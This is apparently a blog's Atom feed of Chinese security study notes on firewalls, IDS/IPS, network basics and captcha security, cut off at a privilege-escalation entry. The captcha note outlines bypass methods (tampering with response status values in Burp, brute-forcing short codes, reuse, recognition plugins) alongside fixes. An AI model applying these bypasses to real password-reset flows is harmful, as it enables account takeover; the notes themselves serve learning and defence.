-
Notifications
You must be signed in to change notification settings - Fork 0
/
atom.xml
504 lines (248 loc) · 707 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>网络安全</title>
<subtitle>学习笔记</subtitle>
<link href="https://myprefer.github.io/atom.xml" rel="self"/>
<link href="https://myprefer.github.io/"/>
<updated>2024-06-14T03:54:34.075Z</updated>
<id>https://myprefer.github.io/</id>
<author>
<name>Myperfer</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>网络安全设备相关知识</title>
<link href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86.html"/>
<id>https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86.html</id>
<published>2024-06-13T07:40:52.000Z</published>
<updated>2024-06-14T03:54:34.075Z</updated>
<content type="html"><![CDATA[<h2 id="网络安全设备"><a href="#网络安全设备" class="headerlink" title="网络安全设备"></a>网络安全设备</h2><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86">网络安全设备相关知识 | Myprefer’s Blog</a></p><h3 id="防火墙"><a href="#防火墙" class="headerlink" title="防火墙"></a>防火墙</h3><h4 id="作用"><a href="#作用" class="headerlink" title="作用"></a>作用</h4><ul><li><strong>控制</strong>: 对进出数据进行限制(包过滤, 如ACL)</li><li><strong>管理</strong>: 网络隔离, 进行安全防护(NAT)</li><li><strong>记录</strong>: 对进出数据进行检查, 记录相关信息</li></ul><h4 id="功能"><a href="#功能" class="headerlink" title="功能"></a>功能</h4><ul><li><p>在网络协议栈的各个层次上实施网络访问控制机制</p><ul><li>网络层: 包过滤</li><li>传输层: 电路级代理</li><li>应用层: 应用层代理/网关</li></ul></li><li><p>控制网络域间传送的数据流</p><ul><li>检查网络流量</li><li>防止脆弱或不安全的协议和服务</li><li>防止内部网络信息外泄</li><li>对网络存取和访问进行监控和审计</li><li>强化网络安全策略, 集成网络安全防御机制</li></ul></li></ul><h4 id="不足"><a href="#不足" class="headerlink" title="不足"></a>不足</h4><ul><li>无法防范内部的安全威胁(防外不防内</li><li>不能防范病毒</li><li>不能防范针对开放服务安全漏洞的渗透攻击</li><li>不能防范针对网络客户端程序的渗透攻击</li><li>不能防范基于隐蔽通道的特洛伊木马或僵尸网络</li></ul><h4 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h4><ul><li>按形态: 硬件/软件</li><li>按技术: 包过滤(透明模式, 连交换机)/代理(可作路由 ,NAT, ACL)</li></ul><h4 id="实现技术"><a href="#实现技术" class="headerlink" title="实现技术"></a>实现技术</h4><h5 id="包过滤"><a href="#包过滤" class="headerlink" title="包过滤"></a>包过滤</h5><ul><li>实现机制: 依据数据包的级别<strong>标记</strong>来控制数据包 </li><li>优点:<ul><li>只分析数据包的IP, TCP/UDP协议和端口, 速度快</li><li>易于配置</li><li>对用户透明, 不需要提供额外的密码等</li></ul></li><li>缺点:<ul><li>只在网络层, 不能识别应用层协议或维持连接状态</li><li>安全性薄弱, 不能防止IP欺骗</li><li>难正确制订规则</li><li>不能引入认证机制</li></ul></li></ul><h5 id="代理网关"><a href="#代理网关" class="headerlink" title="代理网关"></a>代理网关</h5><ul><li>每一个内外网络之间的连接都要通过防火墙的介入和转换加强了控制</li><li>不同层面的代理技术:<ul><li>应用层: 应用层代理(HTTP代理)</li><li>传输层: 电路级代理(Socks代理)</li><li>网络层: NAT代理(NAT网关, 拨号上网路由器)</li></ul></li></ul><h5 id="代理-proxy-技术"><a href="#代理-proxy-技术" class="headerlink" title="代理(proxy)技术"></a>代理(proxy)技术</h5><ul><li>运行客户端通过代理与网络服务进行非直接的连接</li><li>在代理服务器上可以进行服务控制和内容检查</li></ul><h6 id="应用层代理"><a href="#应用层代理" class="headerlink" title="应用层代理"></a>应用层代理</h6><ul><li>也称应用层网关, 代理服务器</li><li>代理HTTP, Email等应用层服务</li></ul><h6 id="电路级代理"><a href="#电路级代理" class="headerlink" title="电路级代理"></a>电路级代理</h6><ul><li>在传输层</li><li>同时位多种不同的应用服务提供支持</li></ul><h5 id="NAT"><a href="#NAT" class="headerlink" title="NAT"></a>NAT</h5><ul><li>将私有地址转化为合法地址</li><li>允许多个用户分享少量或单一的IP地址(源IP)</li><li>允许将网络服务映射到内部服务网络IP和端口(目的NAT)</li></ul><h5 id="状态检测"><a href="#状态检测" class="headerlink" title="状态检测"></a>状态检测</h5><ul><li>在数据链路层和网络层之间对数据包进行检测</li><li>创建状态表用于维护连接上下文</li><li>特点: 安全性高, 性能高, 适应性好, 对用户和应用程序透明</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141017052.png"></p><h4 id="部署方式"><a href="#部署方式" class="headerlink" title="部署方式"></a>部署方式</h4><h5 id="路由模式"><a href="#路由模式" class="headerlink" title="路由模式"></a>路由模式</h5><ol><li>配置接口互联地址。(配置ip)</li><li>配置路由,使地址路由可达。</li><li>配置源NAT使内网服务器可以访问公网。</li><li>放行对应的防火墙策略。</li></ol><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141034988.png"></p><p>当防火墙位于内部网络和外部网络之间时,需要将防火墙与内部网络、外部网络以及DMZ 三个区域相连的接口分别配置成不同网段的IP 地址,重新规划原有的网络拓扑,此时相当于一台<strong>路由器</strong>。</p><h5 id="透明模式"><a href="#透明模式" class="headerlink" title="透明模式"></a>透明模式</h5><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141036802.png"></p><p>如果防火墙采用透明模式进行工作,则可以避免改变拓扑结构造成的麻烦,此时防火墙对于子网用户和路由器来说是完全透明的。也就是说,用户完全感觉不到防火墙的存在。</p><h5 id="混合模式"><a href="#混合模式" class="headerlink" title="混合模式"></a>混合模式</h5><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141037016.png"></p><p>如果防火墙既存在工作在路由模式的接口(接口具有IP 地址),又存在工作在透明模式的接口(接口无IP 地址),则防火墙工作在混合模式下。</p><h4 id="部署方法"><a href="#部署方法" class="headerlink" title="部署方法"></a>部署方法</h4><h5 id="包过滤路由器"><a href="#包过滤路由器" class="headerlink" title="包过滤路由器"></a>包过滤路由器</h5><p><img src="C:\Users\Myprefer\AppData\Roaming\Typora\typora-user-images\image-20240614104619194.png" alt="image-20240614104619194"></p><ul><li><strong>优势</strong>: 成本低, 易用</li><li><strong>缺点</strong>:<ul><li>一旦路由器被攻破, 内网完全暴露</li><li>内部网络信息对外公开, 可攻击开放的主机和服务</li></ul></li></ul><h5 id="双宿主堡垒主机"><a href="#双宿主堡垒主机" class="headerlink" title="双宿主堡垒主机"></a>双宿主堡垒主机</h5><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>堡垒主机(Bastion Host): 对外部网络暴露, 同时也是内部网络用户的主要连接点</p><p>双宿主主机(Dual-homed Host): 至少有两个网络接口的通用计算机系统</p></blockquote><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141049303.png"></p><ul><li>使用应用代理网关作为双宿主堡垒主机<ul><li>一个使用公网IP地址连接外部网络</li><li>一个使用私有IP地址连接内部网络</li><li>由应用代理服务器程序为特定的网络应用提供代理</li></ul></li><li>优点: 对外屏蔽内网信息, 用户身份认证和行为审计</li><li>缺点:<ul><li>内网对外访问控制过于严格</li><li>堡垒主机安全性差</li><li>一旦堡垒主机被攻破, 内网也将全面暴露</li></ul></li></ul><h5 id="屏蔽主机"><a href="#屏蔽主机" class="headerlink" title="屏蔽主机"></a>屏蔽主机</h5><h5 id="屏蔽子网"><a href="#屏蔽子网" class="headerlink" title="屏蔽子网"></a>屏蔽子网</h5><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>DMZ(Demilitarized Zone, 非军事区或停火区): 在内部网络和外部网络之间增加的一个子网</p></blockquote><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141113256.png"></p><ul><li>三层防护: 外网防火墙, 应用层代理, 内网防火墙</li></ul><h4 id="策略设置"><a href="#策略设置" class="headerlink" title="策略设置"></a>策略设置</h4><ul><li>没有明确允许的就是禁止<ul><li>先阻止所有数据包</li><li>放行允许的</li></ul></li></ul><h3 id="入侵检测系统-IDS"><a href="#入侵检测系统-IDS" class="headerlink" title="入侵检测系统(IDS)"></a>入侵检测系统(IDS)</h3><p>入侵检测系统是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取<strong>主动</strong>反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。</p><h4 id="作用-1"><a href="#作用-1" class="headerlink" title="作用"></a>作用</h4><ul><li>防火墙的重要补充</li><li>构建网络安全防御体系重要环节</li><li>克服传统防御机制的限制</li></ul><h4 id="功能-1"><a href="#功能-1" class="headerlink" title="功能"></a>功能</h4><ul><li>监测分析用户和系统的活动</li><li>核查系统配置和漏洞</li><li>日志管理, 识别异常活动</li><li>针对攻击行为作出反应</li></ul><h4 id="技术架构"><a href="#技术架构" class="headerlink" title="技术架构"></a>技术架构</h4><ul><li>事件产生器</li><li>事件分析器</li><li>响应单元</li><li>事件数据库</li></ul><h4 id="工作过程"><a href="#工作过程" class="headerlink" title="工作过程"></a>工作过程</h4><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141130084.png"></p><h4 id="种类"><a href="#种类" class="headerlink" title="种类"></a>种类</h4><ul><li>基于网络的入侵检测系统(<strong>NIDS</strong>)<ul><li>IDS可以放在防火墙或网关的后面, 以网络嗅探器的形式捕获所有的对内对外的数据包</li></ul></li><li>基于主机的入侵检测系统(<strong>HIDS</strong>)<ul><li>安全操作系统必须有一定的审计功能, 并记录相应的安全性内核</li></ul></li><li>分布式入侵检测系统(<strong>DIDS</strong>)</li></ul><h4 id="局限性"><a href="#局限性" class="headerlink" title="局限性"></a>局限性</h4><ul><li>使用复杂</li><li>现有技术难以满足实际性能需要</li><li>高虚警率, 用户处理的负担重</li><li>许多警告信息难以与入侵行为相关联</li><li>对其他数据的检测可能会受影响</li></ul><h3 id="安全隔离与信息交换系统-网闸"><a href="#安全隔离与信息交换系统-网闸" class="headerlink" title="安全隔离与信息交换系统(网闸)"></a>安全隔离与信息交换系统(网闸)</h3><h4 id="组成"><a href="#组成" class="headerlink" title="组成"></a>组成</h4><ul><li>外部处理单元</li><li>内部处理单元</li><li>仲裁处理单元</li></ul><h4 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h4><ul><li>断开内外网之间的会话(物理隔离, 协议隔离)</li><li>集成了其他安全技术</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141142951.png"></p><h3 id="入侵防御系统-IPS"><a href="#入侵防御系统-IPS" class="headerlink" title="入侵防御系统(IPS)"></a>入侵防御系统(IPS)</h3><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141143640.png"></p><h4 id="IDS与IPS"><a href="#IDS与IPS" class="headerlink" title="IDS与IPS"></a>IDS与IPS</h4><ul><li>IDS: 旁路监听, 只起到检测作用</li><li>IPS: 内联模式, 实时处置数据包</li></ul><h3 id="统一威胁管理系统-UTM"><a href="#统一威胁管理系统-UTM" class="headerlink" title="统一威胁管理系统(UTM)"></a>统一威胁管理系统(UTM)</h3><ul><li>防火墙 + IDS + IPS + 防毒墙</li></ul><h3 id="网络架构安全设计"><a href="#网络架构安全设计" class="headerlink" title="网络架构安全设计"></a>网络架构安全设计</h3><ul><li>合理划分网络安全区域</li><li>规划网络IP地址, vlan设计</li><li>安全配置路由交换设备</li><li>网络边界访问控制</li><li>网络冗余配置(HSRP\vrrp冗余技术), 负载均衡<ul><li>防止单点故障</li><li>提供网络健全性, 安全性</li></ul></li></ul>]]></content>
<summary type="html"><h2 id="网络安全设备"><a href="#网络安全设备" class="headerlink" title="网络安全设备"></a>网络安全设备</h2><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%</summary>
</entry>
<entry>
<title>网络拓扑基础</title>
<link href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80.html"/>
<id>https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80.html</id>
<published>2024-06-10T08:02:31.000Z</published>
<updated>2024-06-14T05:52:24.026Z</updated>
<content type="html"><![CDATA[<p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80">网络拓扑基础 | Myprefer’s Blog</a></p><h2 id="网络基础概念"><a href="#网络基础概念" class="headerlink" title="网络基础概念"></a>网络基础概念</h2><h3 id="IP地址"><a href="#IP地址" class="headerlink" title="IP地址"></a>IP地址</h3><ul><li>IP地址在网络中用于标识一个节点(或者网络设备的接口)</li><li>IP地址用于IP报文在网络中的寻址</li></ul><p><em>IP地址就像现实中的地址, 可以标识网络中的一个节点, 数据就是通过它来找到目的地</em></p><h4 id="IP地址格式"><a href="#IP地址格式" class="headerlink" title="IP地址格式"></a>IP地址格式</h4><p><strong>192.168.1</strong>.1</p><p>网络位(192.168.1) + 主机位</p><p>由<strong>子网掩码</strong>决定网络位长度</p><ul><li><strong>192.168.1</strong>.1 — <strong>255.255.255</strong>.0(掩码)</li><li><strong>192.168</strong>.1.1 — <strong>255.255</strong>.0.0(掩码)</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406101743973.png"></p><h4 id="配置IP地址"><a href="#配置IP地址" class="headerlink" title="配置IP地址"></a>配置IP地址</h4><div class="language-shell"><button title="Copy code" class="copy"></button><span class="lang">shell</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">interface</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #C3E88D">接</span><span style="color: #BABED8">口</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #FFCB6B">ip</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">address</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">192.168</span><span style="color: #C3E88D">.1.1</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">255.255</span><span style="color: #C3E88D">.255.0</span></span></code></pre></div><h4 id="Dhcp"><a href="#Dhcp" class="headerlink" title="Dhcp"></a>Dhcp</h4><ul><li>作用: 自动给电脑/手机配置IP地址</li></ul><h3 id="DNS域名系统"><a href="#DNS域名系统" class="headerlink" title="DNS域名系统"></a>DNS域名系统</h3><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406101830542.png"></p><h3 id="路由技术基础"><a href="#路由技术基础" class="headerlink" title="路由技术基础"></a>路由技术基础</h3><h4 id="网关"><a href="#网关" class="headerlink" title="网关"></a>网关</h4><p><strong>不同网段</strong>之间的通信需要经过网关</p><h4 id="路由器"><a href="#路由器" class="headerlink" title="路由器"></a>路由器</h4><p>路由器的转发原理是通过路由表来判断数据包从哪个接口发出, 实现数据包的转发</p><ul><li>显示路由表: <code>dis ip routing-table <ip></code></li></ul><h4 id="TCP"><a href="#TCP" class="headerlink" title="TCP"></a>TCP</h4><ul><li>可靠性高, 三次握手</li><li>延迟高</li></ul><p>适合对文件传输的完整性高, 对延迟不敏感的服务</p><h4 id="UDP"><a href="#UDP" class="headerlink" title="UDP"></a>UDP</h4><ul><li>速度快</li><li>不可靠</li></ul><p>适用于网络游戏, 视频通话等</p><h4 id="交换机的接口模式"><a href="#交换机的接口模式" class="headerlink" title="交换机的接口模式"></a>交换机的接口模式</h4><ul><li>Access: 用来连接终端, 电脑, 打印机</li><li>Trunk: 用来连接其他交换机</li></ul><h3 id="Vlan虚拟局域网"><a href="#Vlan虚拟局域网" class="headerlink" title="Vlan虚拟局域网"></a>Vlan虚拟局域网</h3><ul><li><p>安全, 隔离<br>vlan-10中的设备可以ping通</p><p>vlan-10与vlan-20中的设备不能ping通</p></li></ul><p>识别数据包属于哪个vlan:</p><ul><li>交换机进行数据包标记, 通过标签判断</li></ul><h3 id="ACL访问控制列表"><a href="#ACL访问控制列表" class="headerlink" title="ACL访问控制列表"></a>ACL访问控制列表</h3><p>根据预先定义好的规则对流量进行<strong>筛选</strong>和<strong>过滤</strong></p><h5 id="ACL的类型"><a href="#ACL的类型" class="headerlink" title="ACL的类型"></a>ACL的类型</h5><ul><li><strong>标准访问控制列表</strong>: 只能基于源ip地址进行过滤</li><li><strong>扩展访问控制列表</strong>: 可以根据源、目IP,TCP/UDP协议,源、目端口号进行过滤</li></ul><h3 id="NAT网络地址转换"><a href="#NAT网络地址转换" class="headerlink" title="NAT网络地址转换"></a>NAT网络地址转换</h3><p>用于实现私有网络和公有网络之间的互访 </p><ul><li>NAT外部的主机无法主动跟位于NAT内部的主机通信,NAT内部2主机想要通信,必须主动和公网的一个IP通信,路由器负责建立一个<strong>映射关系</strong>,从而实现数据的转发。</li></ul><h5 id="静态NAT"><a href="#静态NAT" class="headerlink" title="静态NAT"></a>静态NAT</h5><ul><li>静态NAT实现私网地址和公网地址的一对一转换。(服务器公网IP)</li></ul><h3 id="远程管理网络设备"><a href="#远程管理网络设备" class="headerlink" title="远程管理网络设备"></a>远程管理网络设备</h3><ul><li>telnet:<div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">telnet</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #C3E88D">I</span><span style="color: #BABED8">P</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #C3E88D">POR</span><span style="color: #BABED8">T</span><span style="color: #89DDFF">></span></span></code></pre></div></li></ul>]]></content>
<summary type="html"><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80">网络拓扑基础 | Myprefer’s Blog</a></p>
<h2 id=</summary>
</entry>
<entry>
<title>内网安全-网络知识</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E7%BD%91%E7%BB%9C%E7%9F%A5%E8%AF%86.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E7%BD%91%E7%BB%9C%E7%9F%A5%E8%AF%86.html</id>
<published>2024-06-01T03:11:57.000Z</published>
<updated>2024-06-01T03:20:11.238Z</updated>
<content type="html"><![CDATA[<h2 id="内网安全-网络知识"><a href="#内网安全-网络知识" class="headerlink" title="内网安全-网络知识"></a>内网安全-网络知识</h2><ul><li><p>隧道技术: 解决不出网协议上线的问题(利用出网协议进行封装出网)(如TCP -> UDP)</p></li><li><p>代理技术: 解决网络通讯不通的问题(利用跳板机建立节点后续操作)</p></li><li><p>连接方向: 正向&方向(内找外/外找内)</p></li></ul>]]></content>
<summary type="html"><h2 id="内网安全-网络知识"><a href="#内网安全-网络知识" class="headerlink" title="内网安全-网络知识"></a>内网安全-网络知识</h2><ul>
<li><p>隧道技术: 解决不出网协议上线的问题(利用出网协议进行封装出网)(</summary>
</entry>
<entry>
<title>WEB攻防-验证码安全</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%AA%8C%E8%AF%81%E7%A0%81%E5%AE%89%E5%85%A8.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%AA%8C%E8%AF%81%E7%A0%81%E5%AE%89%E5%85%A8.html</id>
<published>2024-05-07T09:32:21.000Z</published>
<updated>2024-05-07T14:24:11.405Z</updated>
<content type="html"><![CDATA[<h2 id="验证码安全"><a href="#验证码安全" class="headerlink" title="验证码安全"></a>验证码安全</h2><h4 id="找回密码客户端回显-Response状态值-修改重定向"><a href="#找回密码客户端回显-Response状态值-修改重定向" class="headerlink" title="找回密码客户端回显&Response状态值&修改重定向"></a>找回密码客户端回显&Response状态值&修改重定向</h4><ul><li><p>用回显状态判断-res前端判断不安全</p><ul><li><p>不安全方式:</p></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">错误验证->服务器返回状态<3>->浏览器 错误</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">错误验证->服务器返回状态<3>->burp代理抓包改为<1>->浏览器 正确</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">--客户端验证为准</span></span></code></pre></div></li><li><p>安全方式:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">错误验证->服务器返回状态<3>->burp代理抓包改为<1>->浏览器显示正确->服务器后端验证错误->失败</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">--服务器验证为准</span></span></code></pre></div></li></ul></li><li><p>用用户名重定向-修改标示绕过验证</p></li><li><p>验证码回显显示验证码泄漏验证虚设</p><ul><li>数据包中就有没有加密或加密过的验证码</li></ul></li><li><p>验证码简单机制验证码过于简单爆破</p><ul><li>如四位数字简单验证码(0000~9999), 仅10000钟可能, 如没有次数限制, 可以爆破</li></ul></li></ul><h4 id="验证码验证安全机制-爆破-复用-识别"><a href="#验证码验证安全机制-爆破-复用-识别" class="headerlink" title="验证码验证安全机制-爆破&复用&识别"></a>验证码验证安全机制-爆破&复用&识别</h4><ul><li>验证码简单机制-验证码过于简单爆破</li><li>验证码重复使用验证码验证机制绕过</li><li>验证码智能识别-验证码图形码被识别</li><li>验证码接口调用-验证码触发机制枚举</li></ul><h4 id="验证码技术验证码爆破,验证码复用,验证码识别等"><a href="#验证码技术验证码爆破,验证码复用,验证码识别等" class="headerlink" title="验证码技术验证码爆破,验证码复用,验证码识别等"></a>验证码技术验证码爆破,验证码复用,验证码识别等</h4><ul><li>识别工具:<ul><li><a href="https://github.com/smxiazi/NEW_xp_CAPTCHA">smxiazi/NEW_xp_CAPTCHA: xp_CAPTCHA(瞎跑 白嫖版) burp 验证码 识别 burp插件 (github.com)</a></li><li><a href="https://github.com/c0ny1/captcha-killer">c0ny1/captcha-killer: burp验证码识别接口调用插件 (github.com)</a></li></ul></li></ul><h4 id="安全修复方案"><a href="#安全修复方案" class="headerlink" title="安全修复方案"></a>安全修复方案</h4><ul><li>找回机制要进行每一步验证-防绕过重定向</li><li>找回机制要进行服务端验证-防s数据修改</li><li>找回机制要控制验证码安全防验证码攻击</li><li>验证码接口需验证后被调用-防接口被乱调用</li><li>验证码弱引用智能化人工判断-防验证码被识别</li><li>验证码采用时间段生效失效-防验证码被复用</li></ul>]]></content>
<summary type="html"><h2 id="验证码安全"><a href="#验证码安全" class="headerlink" title="验证码安全"></a>验证码安全</h2><h4 id="找回密码客户端回显-Response状态值-修改重定向"><a href="#找回密码客户端回显-Resp</summary>
</entry>
<entry>
<title>权限提升</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87.html</id>
<published>2024-04-18T03:44:47.000Z</published>
<updated>2024-05-20T03:24:32.839Z</updated>
